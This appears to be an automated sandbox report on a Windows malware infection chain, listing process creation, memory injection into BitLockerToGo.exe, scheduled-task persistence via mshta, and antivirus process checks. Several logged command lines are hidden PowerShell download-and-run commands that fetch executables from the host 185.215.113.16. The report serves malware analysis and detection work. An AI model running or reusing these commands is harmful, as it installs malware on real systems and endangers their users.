Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6752, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory written: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BE008
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F71201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F52BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00F52BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7B226 SendInput,keybd_event,

8_2_00F7B226

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

8_2_00F922DA

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F70B62

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_00F71663

Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: rcFProgram Manager
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Program Manager
Source: afccf6841f.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_008FD3E2 cpuid

6_2_008FD3E2

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
